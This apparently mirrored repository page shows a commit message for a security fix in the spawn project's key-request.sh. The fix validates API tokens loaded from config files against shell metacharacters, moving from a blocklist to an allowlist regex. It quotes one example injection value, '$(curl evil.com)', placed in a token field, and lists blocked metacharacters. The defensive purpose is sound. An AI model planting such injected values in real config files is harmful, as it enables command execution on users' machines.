mirror of
https://github.com/OpenRouterTeam/spawn.git
synced 2026-05-08 10:09:30 +00:00
266fdd9a1d
* security: prevent command injection in key-request.sh env var loading Fixes #1405 **Why:** The _try_load_env_var function loaded API tokens from ~/.config/spawn/{cloud}.json without validating the value for shell metacharacters. If an attacker could write malicious config files (e.g., {"HCLOUD_TOKEN": "$(curl evil.com)"}), the injected commands would execute when the variable was later used in unquoted contexts. **Changes:** - Added regex validation in _try_load_env_var (line 88-91) to reject values containing shell metacharacters: ; ' " < > | & $ ` \ ( ) - Matches the same pattern used in validate_api_token() from shared/common.sh - Now returns error and logs security warning if malicious characters detected **Impact:** Blocks command injection attacks via config file poisoning. API tokens must now be clean alphanumeric strings (as they should be from legitimate providers). Agent: security-auditor Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com> * security: strengthen key-request.sh regex to block all shell metacharacters Address security review feedback from PR #1415. **Changes:** - Replace blocklist regex with whitelist: `^[a-zA-Z0-9._/@-]+$` - Now blocks `!`, `{`, `}`, `#`, newlines, tabs, and all other metacharacters - Update comment to clarify defense-in-depth purpose - Change error message to match validate_api_token() pattern **Why whitelist approach:** API tokens from legitimate cloud providers only contain alphanumeric characters plus safe chars (-, _, ., /, @). Whitelist is more robust than trying to enumerate all dangerous shell metacharacters. -- pr-maintainer --------- Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com> |
||
|---|---|---|
| .. | ||
| common.sh | ||
| github-auth.sh | ||
| key-request.sh | ||